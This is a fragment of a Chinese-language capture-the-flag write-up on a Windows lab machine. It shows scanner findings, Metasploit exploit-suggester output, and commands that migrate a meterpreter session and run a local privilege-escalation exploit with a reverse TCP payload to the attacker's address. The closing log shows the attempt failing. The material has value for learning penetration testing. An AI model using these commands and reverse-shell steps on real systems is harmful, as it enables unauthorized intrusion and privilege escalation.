+ OSVDB-397: HTTP method('Allow' Header):'PUT'methodcouldallowclientstosavefilesonthewebserver. + OSVDB-5647: HTTP method('Allow' Header):'MOVE' may allow clients to change file locations on the web server.
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The target service isrunning, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service isrunning, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms16_032: The target service isrunning, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service isrunning, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed
writeup
之前使用getuid命令,但是结果报错,还以为是权限不够。
msf进程存在于内存之中,以下命令将进程迁移为稳定进程,再使用getuid命令,就不会报错了。
1 2 3 4 5 6 7 8 9 10
background use post/windows/manage/migrate set SESSION 1 run
use exploit/windows/local/ppr_flatten_rec set payload windows/meterpreter/reverse_tcp set LHOST 10.10.14.7 set LPORT 8899 set SESSION 1
总结
失败的提示
1 2 3 4 5 6 7 8 9
[*] Started reverse TCP handler on 10.10.14.7:8899 [*] Launching notepad to host the exploit... [+] Process208 launched. [*] Reflectively injecting the exploit DLL into 208... [*] Injecting exploit into 208 ... [*] Exploit injected. Injecting payload into 208... [*] Payload injected. Executing exploit... [*] Exploit thread executing (can take a while to run), waiting 30 sec ... [*] Exploit completed, but no session was created.